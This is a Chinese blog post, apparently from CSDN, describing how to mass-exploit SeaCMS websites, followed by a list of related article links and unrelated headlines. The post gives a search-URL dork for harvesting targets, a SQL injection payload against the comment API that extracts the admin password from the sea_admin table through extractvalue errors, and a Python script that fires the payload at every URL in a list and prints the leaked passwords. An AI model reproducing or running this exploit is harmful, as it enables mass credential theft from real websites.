0x001-url采集
通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站


0x002-漏洞payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27

0x003-exp制作

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:url1 = url.strip()a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:result = "\n".join(aa)f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:try:target = url.strip() + exphtml = requests.get(target).textif "seacms" in html:print(target)print("该url存在漏洞:"+url)print(re.search(pattern,html).group(1))except Exception as e:pass

0x004-exp的使用效果*

海洋seacms漏洞利用相关推荐

  1. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  2. 流行漏洞利用工具包瞄准Flash、Java和IE

    Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...

  3. Flash Player漏洞利用Exploiting Flash Reliably

    以下消息来自幻影论坛[Ph4nt0m]邮件组   前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...

  4. 溢出漏洞利用小结(基础)

    shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

  5. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  6. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  7. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  8. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  9. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

最新文章

  1. java并发读取相同的文件_高效读取大文件,再也不用担心 OOM 了!
  2. CF476D Dreamoon and Sets (数学/思维)
  3. Spring boot 启动后执行特定的操作
  4. PHP5中数组函数总结
  5. Python——eventlet.greenpool
  6. 负margin应用案例几则(转载+总结)
  7. mean shift 图像分割(一、二、三)
  8. YARN作业提交流程剖析
  9. python抛硬币正面向上概率_Python-计算抛硬币出现连续10次正面朝上的概率的仿真实验...
  10. IIC,SPI,I2S
  11. 轴承过盈量程序matlab,轴承matlab处置程序.doc
  12. Debug查看汉字机内码
  13. 嵌入式中的 C 语言
  14. OpenGL渲染YUV420P
  15. IPC的标准是什么?
  16. c语言编程求广义逆矩阵,求大神解答求广义逆矩阵的问题 拜谢了!!
  17. 出现C:\Users\liu\AppData\Local\Programs\Python\Python35\lib\site-packages\tensorflow\contrib\rnn\pytho
  18. git 分支关系图谱讲解
  19. SAP ABAP MOVE 及 CORRESPONDING 7.4版本新用法
  20. Windows查看Java内存使用情况

热门文章

  1. error: stray ‘\’ in program
  2. 所有的错误都是精心包装的礼物
  3. python一小时快速入门(一)
  4. kubernetes不同的命名空间下的容器能通信吗_深入浅出聊聊Kubernetes网络:容器网络初探...
  5. 总结移动端video视频播放的坑
  6. 加拿大红河学院计算机专业,加拿大红河学院都有什么专业
  7. HOJ 2739 网络流【带权有向图上的中国邮路问题】
  8. rocketMq源码启动
  9. 更新日志 150930 - 视频时代
  10. ganglia离线安装_ganglia安装教程(centos7)